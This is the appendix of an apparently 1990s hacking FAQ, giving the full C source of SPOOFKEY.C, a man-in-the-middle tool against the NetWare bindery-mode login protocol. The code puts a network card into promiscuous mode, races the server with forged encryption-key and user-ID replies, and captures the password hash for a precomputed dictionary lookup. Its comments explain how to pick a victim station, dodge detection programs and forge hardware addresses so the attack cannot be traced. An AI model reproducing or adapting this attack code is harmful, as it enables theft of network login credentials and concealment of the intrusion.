---------------------------------------------------------------------------

Appendix Section - Source Code and Other Documentation

A-02. Source code to SPOOFKEY

Greg's comments are in the source code file...

---------------------------------------------------------------------------

/*          SPOOFKEY.C (C) 1996 by Greg Miller (distribute freely)     */

/*    Here we use a sequence number trick to implement a MITM attack
on the Netware bindery mode login protocol.  The "trick" allows us
to implement the attack on a single machine which resides somewhere 
in between the attacking station and the server.
*/

/*
        This program implements the last step of an attack discovered by
David Wagner <daw@cs.berkeley.edu>.  Before running this program you will
need to (1) get a good word list (try ftp://sable.ox.ac.uk/pub/wordlists),
(2)  convert the wordlist into a hash list (try
http://grendel.ius.indiana.edu/~gmiller/) and (3) edit the SpoofStation[]
variable to reflect the station you want to attack.  After running the
program, the hash will be displayed.  Look up this hash in the hash list
generated above and you will be able to use the corresponding password
to log in as the user you spoofed.

        The attack spoofs both the user ID and the random value generated
by the server when a workstation attempts to log in.  This allows an
attacker to use a pre-generated hash list to look up possible passwords.
Here, I have used a "random value" of FFFFFFFFFFFFFFFF and and ID of
FFFFFFFF.
*/


/*
NOTE:  You will have to run this on a pretty fast machine to beat the
server's responses.  It seems pretty simple, but it's not unless the server
is carying a pretty heavy load.  I've also run into problems where the
workstation's requests were lost.  That shows this program could use some
very heavy optimization.
*/

/*
NOTE:  The workstation will attempt two login requests.  One is to login
without a password, the second is the real login request.  Because of this
you'll see two hashes printed rather than just one.  The second hash is the
only one you're interested in.
*/

/*
NOTE:  This program will only work on 3.x servers, or on 4.x servers when
the workstation logs in in bindery mode.
*/

#include <stdio.h>
#include <string.h>
#include <conio.h>

#define TRUE -1
#define FALSE 0

//Offset of the IPX packet type in an 802.3 frame
#define PACKET_TYPE 19

//Offset of the NCP function code in an 802.3 frame
#define FUNCTION_CODE 50

//Offset of the NCP subfunction code in an 802.3 frame
#define SUBFUNC_CODE 53

//Offset of the hashed password in the NCP client
//request for a login inside an 802.3 frame
#define KEY_OFFSET 52

typedef unsigned char BYTE;
typedef unsigned int WORD;
typedef unsigned long DWORD;

int DataRemaining = TRUE;
int x;

BYTE packet[2000];
BYTE SendPacket[2000];

WORD handle;
int packet_received = FALSE;
int NotDone = TRUE;

/*  Change these varialbles to reflect the station you
    are attacking.  You may also want to alter the spoof
    values for a few reasons:
    1.  It prevents the use of an automated detection 
        program to detect this attack.
    2.  It prevents someone else using a packet sniffer from
        using the same pre-generated word list that you're
        using.  This way, if they want the password, they
        have to do the work themselves.
*/
BYTE SpoofStation[6] = {0x00,0x00,0xf4,0xa9,0x95,0x21};
BYTE SpoofID[4] = {0xff,0xff,0xff,0xff};
BYTE SpoofKey[8] = {0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};

int c;
WORD pktlen;
WORD Sendpktlen;

void Initialize(){
}

/*In reality, the functions for the packet driver API should be in a 
  separate file, but they are included here for ease of distribution.
*/

static void far PacketReceived(){
        /*This function is called by the packet driver when a packet is
          received.  If AX=0 when the function is called, the packet driver
          is asking for a buffer to put the packet in.  If AX=1 then the
          packet has been copied into the buffer.
        */

        _asm{
                pop di          //Borland C 3.1 pushes DI for some reason.
                                //Remove this line if you compiler doesn't.

                cmp ax,1        //ax=0 for get buffer or 1 when done
                jz copy_done

                mov ax,seg packet
                mov ES,ax
                lea DI,packet
                mov cx,2000     //buffer length
                retf
        }

copy_done:
        packet_received = TRUE;
        pktlen=_CX;

        _asm{retf}
end:
}

void RegisterWithPKTDRV(){
        /*This function registers the "protocol stack" with the packet
          driver.  We give it the address of the function to call when
          a packet is received in ES:DI, the interface class in AL, and
          the interface type in BX.  DS:SI should point to the type of
          packets to receive, with the length of the type in CX, however,
          we'll just receive any type of packet so we leave DS:SI alone
          and make CX=0.
          We get a handle back from the INT 60h call in AX, we'll store
          it for later use.
        */

        _asm {
                pusha

                mov bx,0ffffh  //Wild card for all interfaces
                mov dl,0
                mov cx,0    //receive any type of packet
                mov ax, seg PacketReceived
                mov es,ax
                lea di, PacketReceived
                mov ah,02
                mov al,01   //class type for 3com 509
                int 60h
                jc err

                mov handle,ax

                popa
        }

        printf("Registered with packet driver\r\n");
        return;
err:
        printf("Error registering stack: %d\r\n",_DH);
        _asm{popa}

}

void RelinquishProtocolStack(){
        /*  Relinqush control of the interface and unhooks
          the packet received funtion.
      */

        /*Release Type*/
        _asm{   pusha

                mov ah,3
                mov bx,handle
                int 60h
                jc err
            }


        /*Terminate driver for handle*/
        _asm{
                mov ah,5
                mov bx,handle
                int 60h
                jc err

                popa
        }

        printf("Stack Relinqushed\r\n");
        return;
err:
        printf("Error releasing Stack: %d",_DH);
}

void EnterPromiscuousMode(){
        /*This function puts the board in promiscuous mode by putting the
          receive mode in CX and the handle in BX.  Mode 6 is promiscuous.
        This causes the interface to receive all packets on the network.

        The user should note that some network cards send packets out
        on the network to indicate that they are in promiscuous mode.
        When this happens, the real MAC address is put on the network
        for all to see.  This could possibly allow someone to identify
        the attack is occurring, and also where the attack is originating
        from.
        If your card does not implement this feature (most don't), then
        this attack should be carried out undetected.
        */
        _asm{
                pusha

                mov ah,14h
                mov bx,handle
                mov cx,6
                int 60h
                jc err

                popa
        }

        printf("Promiscuous mode set\r\n");
        return;
err:
        printf("Error entering promiscuous mode: %d\r\n",_DH);
        _asm{popa}
}

void printhex(BYTE d){
 /*Ad Hock mechanism for printing HEX dump.  Yes, there are
   much better ways to do it.
 */
 BYTE temp;
 _asm{
  mov al,d
  shr al,1
  shr al,1
  shr al,1
  shr al,1
  and al,0fh
  add al,90h
  daa
  adc al,40h
  daa
 }
 temp=_AL;
 printf("%c",temp);
 _asm{
  mov al,d
  and al,0fh
  add al,90h
  daa
  adc al,40h
  daa
 }
 temp=_AL;
 printf("%c ",temp);
}

void SendPack(){
      /*Puts an ethernet frame on the network.  The premble, etc
        are not included in the data, but the hardware address
        is.  This allows us to spoof our address at the hardware level.

        Although, NetWare doesn't care what the hardware address is, 
        implementing the attack in this way allows us to avoid the
        attack to be traced back to a given machine, should the 
        attack be detected.
      */

        _asm{   pusha

                mov ax,seg SendPacket
                mov ds,ax
                lea si,SendPacket
                mov cx,Sendpktlen
                mov ah,04
                int 60h

                jc err

                popa
        }
        printf("Sending:\r\n");
        for(c=0;c<pktlen;c++){printhex(packet[c]);}
        printf("\r\n");
        return;
err:
        printf("Error sending packet: %d\r\n",_DH);
        _asm{popa}
}

void SendEncryptionKeyReply(){
      /*We've seen the client station request an encryption key from
        the server.  We will spoof our fake encryption key back to the
        client, and hopfully beat the server.  If we do the client
        will ignore the server's reply and use our key.  
        To make this happen, we have to use the propper sequence number
        for the reply.  With NCP, sequence numbers are mearly counters
        of the number of packets sent for that connection.  When the
        client sends a request, the reply will use the same sequence
        number as the request did.  Due to the structure of the NCP
        protocol, no acknowledgment of receipt is needed.
        Due to the behaviour of the sequence numbers, both the server
        and the client stay in a sychronized state, which makes the
        attack much, much easier.  If this was TCP, the code here
        would be much different.
      */

        memcpy(SendPacket,packet+6,6); //Copy 802.3 dest addr
        memcpy(SendPacket+6,packet,6); //Copy 802.3 src addr

        //Put 802.3 length here.
        SendPacket[12]=00;
        SendPacket[13]=0x2e;

        memcpy(SendPacket+20,packet+32,12); //Copy dest addr,net,sock
        memcpy(SendPacket+32,packet+20,12); //Copy src addr,net,sock
        SendPacket[14]=0xff;SendPacket[15]=0xff; //Checksum
        SendPacket[16]=0;SendPacket[17]=0x2e;    //IPX Length
        SendPacket[18]=1;                        //Hop Count
        SendPacket[19]=17;  //Packet type = NCP
        SendPacket[44]=0x33; SendPacket[45]=0x33; //Reply Type
        memcpy(SendPacket+46,packet+46,4);  //Seq num,con num,task,con num hi
        SendPacket[50]=0;  //Completion code
        SendPacket[51]=0;  //Connection Status

        memcpy(SendPacket+52,SpoofKey,8);  //Key

        Sendpktlen = 60;
        printf("Spoofing Encryption Key Reply\r\n");
        SendPack();
}

void SendIDReply(){
      /*We've seen a request from the client for the UID.  So
        we'll spoof our fake UID in the same manner above.
      */

        memcpy(SendPacket,packet+6,6); //Copy 802.3 dest addr
        memcpy(SendPacket+6,packet,6); //Copy 802.3 src addr

        SendPacket[12]=0;       //802.3 length hi
        SendPacket[13]=0x5c;    //802.3 length lo

        memcpy(SendPacket+20,packet+32,12); //Copy dest addr,net,sock
        memcpy(SendPacket+32,packet+20,12); //Copy src addr,net,sock
        SendPacket[14]=0xff;SendPacket[15]=0xff; //Checksum
        SendPacket[16]=0;SendPacket[17]=0x5c;    //IPX Length
        SendPacket[18]=0;                        //Hop Count
        SendPacket[19]=17;  //Packet type = NCP
        SendPacket[44]=0x33; SendPacket[45]=0x33; //Reply Type
        memcpy(SendPacket+46,packet+46,4);  //Seq num,con num,task,con num hi
        SendPacket[50]=0;  //Completion code
        SendPacket[51]=0;  //Connection Status

        memcpy(SendPacket+52,SpoofID,4);  //ID

        SendPacket[56]=packet[54];SendPacket[57]=packet[55];  //Object type
        memset(SendPacket+58,'\000',47);
        memcpy(SendPacket+58,packet+57,packet[56]);           //Object name

        Sendpktlen=105;
        printf("Spoofing ID Reply\r\n");
        SendPack();
}

void WaitForPacket(){
 while(!packet_received){
 if (kbhit()) NotDone = FALSE;
 }

// for(c=0;c<pktlen;c++){printhex(packet[c]);}
// printf("\r\n");

 packet_received=FALSE;
}

void WaitForStationLoginRequest(){
      /*Here is the main program loop, where the attack
        actually occurs.  When the user types in his
        user name, the client attempts to log in with
        a NULL password.  If that login fails, the user
        is prompted for a password.  Because of this, we'll
        have to spoof the key and UID twice to ensure we
        get both requests.  This is the reason for the 
        for(){...} block.

        The NetWare login protocol is as follows:
        1.  The client sends a request for a login
            key.  And the server responds by sending
            and eight byte random number back to the
            client.
        2.  The client sends a request for the user's
            user ID.  The server responds by sending the
            requested ID back to the client.
        3.  The client performs some function 
            f(UID, key, password) and sends this value to
            the server as a request for a login.  The
            server performs the same calculation, if the
            value received from the client matches the
            value the server computed, the client is
            granted access.

        Since, we've spoofed the UID and the key, the f()
        function will always produce the same values for
        the same password.
        Because of this, we could have pre-generated a 
        list of hashes using a database of common words.  The
        generated database would contain a mapping from the
        hash back to the password.  Given the fact that most
        people use a single word for their password, this 
        database could be generated in only a few hours on a
        PC.  Then it's only a matter of looking up the 
        hash in the database to obtain the password.

        Due to the poor design of the Netware hash function,
        there is likley to be more than one password which 
        hashes to the same value.  This does not mean the 
        passwords are equivelent.  You must attempt to log in
        which each retreived password individually to determine
        the real one.
      */

 for(x=0;x<2;x++){

        /*Wait for login key request and spoof it*/
        printf("Waiting for key request\r\n");
        while(NotDone){
                WaitForPacket();
                  if((memcmp(packet+6,SpoofStation,6)==0) &&
                    (packet[PACKET_TYPE]==17) &&
                    (packet[FUNCTION_CODE]==23) &&
                    (packet[SUBFUNC_CODE]==23)){
                     NotDone = FALSE;
                  }
        }
        SendEncryptionKeyReply();


        /*Wait for ID request and spoof it*/
        printf("Waiting for ID request\r\n");
        NotDone = TRUE;
        while(NotDone){
                WaitForPacket();
                if(memcmp(packet+6,SpoofStation,6)){
                  if((packet[PACKET_TYPE]==17) &&
                   (packet[FUNCTION_CODE]==23) &&
                   (packet[SUBFUNC_CODE]==53)){
                   NotDone = FALSE;
                  }
                }
        }
        SendIDReply();

        /*Wait for login request and pull hash out*/
        printf("Waiting for login request\r\n");
        NotDone = TRUE;
        while(NotDone){
                WaitForPacket();
                if(memcmp(packet,SpoofStation+6,6) &&
                  (packet[PACKET_TYPE]==17) &&
                  (packet[FUNCTION_CODE]==23) &&
                  (packet[SUBFUNC_CODE]==24)){
                  NotDone = FALSE;
                }
        }
        printf("Hash Received\r\n");
        for(c=KEY_OFFSET;c<KEY_OFFSET+7;c++){printhex(packet[c]);}
        printf("\r\n");
 }
}

void main(){

        Initialize();

        RegisterWithPKTDRV();
        EnterPromiscuousMode();

        WaitForStationLoginRequest();

        RelinquishProtocolStack(); /*Toggles prom mode off*/

}

---------------------------------------------------------------------------